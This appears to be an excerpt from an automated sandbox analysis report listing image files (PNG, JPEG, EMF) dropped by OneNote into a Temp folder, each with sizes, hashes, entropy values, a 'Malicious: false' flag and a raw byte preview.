Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Temp\{E8648D11-95CF-44E1-99B5-6DAC6F77211F}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Temp\{E8A03445-94C6-4EA1-99B0-3147419FACFC}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{E8A945B1-70A2-4106-9BB8-934A0CCCACD1}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Temp\{E953B3FB-0B5A-4AB3-8794-EA1D4A05D2E0}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Temp\{EA3C4BE3-3E35-4EA2-8AFA-8739DBE03B67}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Temp\{EB56BBB9-DC90-4B8B-8069-00EA11A1E861}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Temp\{ECCDC94F-DB14-429B-8D11-13635EF8119A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Temp\{EDEA6070-8213-47C2-9E2F-13204EA3A76E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{EE97E291-8DB8-4514-9336-E5B2FF0960B8}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{EF805874-98E5-4E8E-8DD8-E1C2B044B997}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Temp\{F0064D30-4780-448B-A496-89367768C0B2}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
Category:	dropped
Size (bytes):	242903
Entropy (8bit):	7.944495275553473
Encrypted:	false
SSDEEP:	6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
MD5:	C594A4AA7234EF91E6C2714CFE1410F1
SHA1:	C0F720D4CE3196852814D0B7347F0CAA0C6FD526
SHA-256:	10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
SHA-512:	7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

C:\Users\user\AppData\Local\Temp\{F1674A20-3523-4FDB-87C1-095AAAD72719}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
Category:	dropped
Size (bytes):	70028
Entropy (8bit):	7.742089280742944
Encrypted:	false
SSDEEP:	1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
MD5:	EC7811912ACA47F6AEB912469761D70D
SHA1:	C759BC2D908705D599B03BDB366C951B11F99A4E
SHA-256:	FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
SHA-512:	881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
Malicious:	false
Preview:	......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

C:\Users\user\AppData\Local\Temp\{F1AD88CD-DEC6-463D-B1BE-9D50C96D2EB3}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{F23AB30A-5E30-4152-B810-DF9C47CE8973}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	7.534961703340853
Encrypted:	false
SSDEEP:	48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
MD5:	4FC8500BD304AD127AF4B5E269DFF59B
SHA1:	9A5E3432358A0FCDECE86AEB967319B93A65D14A
SHA-256:	B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
SHA-512:	E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.\|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O.....5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F]..........:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.\|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. 